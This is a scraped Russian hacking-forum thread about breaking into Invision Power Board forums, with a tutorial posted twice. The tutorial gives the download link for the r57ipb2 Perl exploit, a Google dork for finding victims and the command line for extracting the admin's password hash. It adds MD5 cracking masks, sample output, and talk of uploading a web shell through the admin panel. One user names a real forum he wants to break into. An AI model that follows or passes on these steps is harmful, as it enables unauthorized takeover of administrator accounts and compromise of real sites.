прямо чтоб просто закачать - не знаю. но если с помощью вышеупомянутых эксплоитов поднять права админа на форуме, то можно закачать на него этот самый скрипт.
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Взлом Invision Power Board
- Автор темы c31337
- Дата начала
прямо чтоб просто закачать - не знаю. но если с помощью вышеупомянутых эксплоитов поднять права админа на форуме, то можно закачать на него этот самый скрипт.
Лол, тут имеется ввиду челу хочется залить шелл. А это собственно вечная проблема. Тут думать надо. Темплейты ИПБ ПХП не суппортят, так что думаем как сделать через картинку.
Trinux
Так с чего начать нужно?
Так с чего начать нужно?
а если загрузить в смайлы? или я неправ?
Alexcube
Я уже упоминал это. Я хз как там. Импорт файлов основан на импорте xml. Можно попробовать еще через авик или через языки попробовать накромсать простенький шелл.
Я уже упоминал это. Я хз как там. Импорт файлов основан на импорте xml. Можно попробовать еще через авик или через языки попробовать накромсать простенький шелл.
Я хочу взломать форум на Invision Power Board v2.0.4 у нас на форуме творится произвол адрес форума http://www.prince-persia.com.ru/forum
Spispadl
Хочешь? Молодец, возьми с полки пирожок.
Не очень понятен смысл поста.
Хочешь? Молодец, возьми с полки пирожок.
Не очень понятен смысл поста.
Alexcube
Прав, прав. Вот не поленился попробовать и даже снял видео. У меня за неделю человек 30 спросило как заливать шелл через админку. Пожалте бриться.
Прав, прав. Вот не поленился попробовать и даже снял видео. У меня за неделю человек 30 спросило как заливать шелл через админку. Пожалте бриться.
:cry2: :cry2: У меня ломануть неполучается кто-нибудь объясните как! :cry2:
Spispadl
Я с твоих постов hooею... Либо чтиай предидущие страницы темы, античат, секьюритилаб наконец, либо нормально напиши ЧТО НЕ ПОЛУЧАЕТСЯ?
Я с твоих постов hooею... Либо чтиай предидущие страницы темы, античат, секьюритилаб наконец, либо нормально напиши ЧТО НЕ ПОЛУЧАЕТСЯ?
немогу команду врубить через перл вычислить немогу
ЛОЛ, ты комп чтоли только что увидел? какую комманду там все просто..
Во скрипткиддисы пошли. Сплойт запустить не судьба.
Вот что я делаю
Взлом форумов IPB (Invision Power Board) < 2.0.4
Делать мы это будем при помощи эксплоита от [..RusH security team..]
Итак что нам понадобится:
-Голова
-Руки. Растущие из правильного (с анатомической точки зрения) места.
-Active Perl
-Сплоит
-MD5 INSIDE (для расшифровки хешей)
Итак приступим.
1)Качаем Active Perl:
http://www.activestate.com/Products...x?id=ActivePerl
Устанавливаем к примеру в c:\perl
Создаем папку c:\perl\sploits -Место где будут лежать сплоиты.
2)Далее качаем сплоит.
Он называется:
r57ipb2
Лежит тут:
http://rst.void.ru/download/r57ipb2.txt
Сохраняем в с:\perl\sploits\
Идем в с:\perl\sploits\ и переименовываем
r57ipb2.txt
в
r57ipb2.pl
Правим сплоит.( Там одна ошибка стоит только присмотреться и сразу бросится в глаза.)
3)Ищем жертву.
Google в помощь.
(Для тех кто в танке: набираем в поле поиска - Powered by Invision Power Board)
4)Идем в командную строку и набираем что-то вроде:
perl c:\perl\splots\r57ipb2.pl www.target.com /directory/ 1 X
Итак разбираем что я только что написал:
[ + ]perl - Запускаем Active Perl;
[ + ]c:\perl\splots\r57ipb2.pl - пусть к сплоиту;
[ + ]www.target.com - Цель;
[ + ]/dir/ - Директория, где хранится форум.Пример: /forum/
Примечание если форум находится в корневом каталоге, то вводим просто: /
Пример:
perl c:\perl\splots\r57ipb2.pl www.target.com / 1 X
[ + ]1 - ID пользователя. (1 - ADMIN);
[ + ]X - Вместо Х надо ввести 1 или 0
1 - Если форум версии [2.0.0; 2.0.4)
0 - Eсли форум версии < 2.0.0
=========================================
Итак мы атакуем форум который находится по адресу:
www.anyurl.com/forum
Версия 1.* Final
Команда будет выглядеть так:
perl c:\perl\splots\r57ipb2.pl www.anyurl.com /forum/ 1 0
=========================================
Должно получиться что-то вроде этого:
## r57ipb2.pl www.anyurl.com /forum/ 1 0
## [~] SERVER : www.anyurl.com
## [~] PATH : /forum/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
=========================================
5)Мы получили не сам пасс, а его хеш.
Теперь из хеша получим пасс. Для этого нам нужна прога MD5INSIDE.
Создаем текстовый док. Вставляем в него хеш. Заходим в MD5INSIDE.
"Файл" >> "Открыть" находим наш док с хешом.
"Поиск". Дальше как повезёт.
Я рекомендую искать по маске. Вот самые популярные маски пассов:
A - Большая буква.
а - маленькая буква.
N - цифра
S - спец. символ.
ааааааа
AAAAAAA
NNNNNNNNNN
Aaaaaaa
aaaaN
aaaaNN
AaaaN
AaaaNN
AaaaaN
AaaaaNN
aaaaaN
aaaaaNN
AAaaaaa
aaaaS
aaaaaS
aaaaaaS
AaaaS
AaaaaS
AaaaaaS
================================
Если пасс не найден следует воспользоваться полным перебором.
Но это займёт много времени. Сколько???
(X^Y*3600)/Z
где:
X - алфавит перебора(кол-во всевозможных символов в пассе)
Y - длина пасса
Z - скорость перебора(кол-во комбинаций в секунду)
Ответ будет получен в часах.
================================
6)Итак пасс получен. Дело за малым - узнать ник этого самого ID 1
В адресной строке браузера вводим путь к форуму.
Допустим www.anyurl.com/forum/ и добавляем следующие.
index.php?showuser=1
Получаем:
www.anyurl.com/forum/index.php?showuser=1
, где 1 - ID пользователя.
Итак у нас есть Логин и Пасс.
Развлекайтесь
P.S. что выделено я несмог сделать.
Взлом форумов IPB (Invision Power Board) < 2.0.4
Делать мы это будем при помощи эксплоита от [..RusH security team..]
Итак что нам понадобится:
-Голова
-Руки. Растущие из правильного (с анатомической точки зрения) места.
-Active Perl
-Сплоит
-MD5 INSIDE (для расшифровки хешей)
Итак приступим.
1)Качаем Active Perl:
http://www.activestate.com/Products...x?id=ActivePerl
Устанавливаем к примеру в c:\perl
Создаем папку c:\perl\sploits -Место где будут лежать сплоиты.
2)Далее качаем сплоит.
Он называется:
r57ipb2
Лежит тут:
http://rst.void.ru/download/r57ipb2.txt
Сохраняем в с:\perl\sploits\
Идем в с:\perl\sploits\ и переименовываем
r57ipb2.txt
в
r57ipb2.pl
Правим сплоит.( Там одна ошибка стоит только присмотреться и сразу бросится в глаза.)
3)Ищем жертву.
Google в помощь.
(Для тех кто в танке: набираем в поле поиска - Powered by Invision Power Board)
4)Идем в командную строку и набираем что-то вроде:
perl c:\perl\splots\r57ipb2.pl www.target.com /directory/ 1 X
Итак разбираем что я только что написал:
[ + ]perl - Запускаем Active Perl;
[ + ]c:\perl\splots\r57ipb2.pl - пусть к сплоиту;
[ + ]www.target.com - Цель;
[ + ]/dir/ - Директория, где хранится форум.Пример: /forum/
Примечание если форум находится в корневом каталоге, то вводим просто: /
Пример:
perl c:\perl\splots\r57ipb2.pl www.target.com / 1 X
[ + ]1 - ID пользователя. (1 - ADMIN);
[ + ]X - Вместо Х надо ввести 1 или 0
1 - Если форум версии [2.0.0; 2.0.4)
0 - Eсли форум версии < 2.0.0
=========================================
Итак мы атакуем форум который находится по адресу:
www.anyurl.com/forum
Версия 1.* Final
Команда будет выглядеть так:
perl c:\perl\splots\r57ipb2.pl www.anyurl.com /forum/ 1 0
=========================================
Должно получиться что-то вроде этого:
## r57ipb2.pl www.anyurl.com /forum/ 1 0
## [~] SERVER : www.anyurl.com
## [~] PATH : /forum/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
=========================================
5)Мы получили не сам пасс, а его хеш.
Теперь из хеша получим пасс. Для этого нам нужна прога MD5INSIDE.
Создаем текстовый док. Вставляем в него хеш. Заходим в MD5INSIDE.
"Файл" >> "Открыть" находим наш док с хешом.
"Поиск". Дальше как повезёт.
Я рекомендую искать по маске. Вот самые популярные маски пассов:
A - Большая буква.
а - маленькая буква.
N - цифра
S - спец. символ.
ааааааа
AAAAAAA
NNNNNNNNNN
Aaaaaaa
aaaaN
aaaaNN
AaaaN
AaaaNN
AaaaaN
AaaaaNN
aaaaaN
aaaaaNN
AAaaaaa
aaaaS
aaaaaS
aaaaaaS
AaaaS
AaaaaS
AaaaaaS
================================
Если пасс не найден следует воспользоваться полным перебором.
Но это займёт много времени. Сколько???
(X^Y*3600)/Z
где:
X - алфавит перебора(кол-во всевозможных символов в пассе)
Y - длина пасса
Z - скорость перебора(кол-во комбинаций в секунду)
Ответ будет получен в часах.
================================
6)Итак пасс получен. Дело за малым - узнать ник этого самого ID 1
В адресной строке браузера вводим путь к форуму.
Допустим www.anyurl.com/forum/ и добавляем следующие.
index.php?showuser=1
Получаем:
www.anyurl.com/forum/index.php?showuser=1
, где 1 - ID пользователя.
Итак у нас есть Логин и Пасс.
Развлекайтесь
P.S. что выделено я несмог сделать.
2 Spispadl:
на секлабе сказали бы "учи матчасть "
или набрать команду ?
ты объясни толком что не получаеться, тебе помогут и объяснят ...
вообще-то нужно (X^Y)/(Z*3600)
на секлабе сказали бы "учи матчасть "
так что собственно не получилось ? хэш получить ?
или набрать команду ?
ты объясни толком что не получаеться, тебе помогут и объяснят ...
Где c:\perl\splots\r57ipb2.pl - путь к файлу со сплойтом
X - ИД форума. Если 0 - то для 1.3 если 1 - для 2.0
А в чем проблема?
4)Идем в командную строку и набираем что-то вроде:
perl c:\perl\splots\r57ipb2.pl www.target.com /directory/ 1 X
Как через команд. строку запустить? :help: :help: :help:
perl c:\perl\splots\r57ipb2.pl www.target.com /directory/ 1 X
Как через команд. строку запустить? :help: :help: :help:
2Spispadl:
Пуск- Выполнить - cmd.exe
будет тебе командная строка ....
там набирай c:\perl\splots\r57ipb2.p ...
это ?
яснее говори ...
не очень поняте вопрос ....
Пуск- Выполнить - cmd.exe
будет тебе командная строка ....
там набирай c:\perl\splots\r57ipb2.p ...
это ?
яснее говори ...
когда откроется командная строка,потом пишешь cd/,после этого пишешь c:\perl\bin\perl.exe c:\perl\sploits\r57ipb2.pl www.target.com /directory/ 1 X
да это
2 Spispadl: ты конечно извини ...
но советую поискать и прочитать статью "Как правильно задавать вопросы" ...
[quoteда это[
но советую поискать и прочитать статью "Как правильно задавать вопросы" ...
[quoteда это[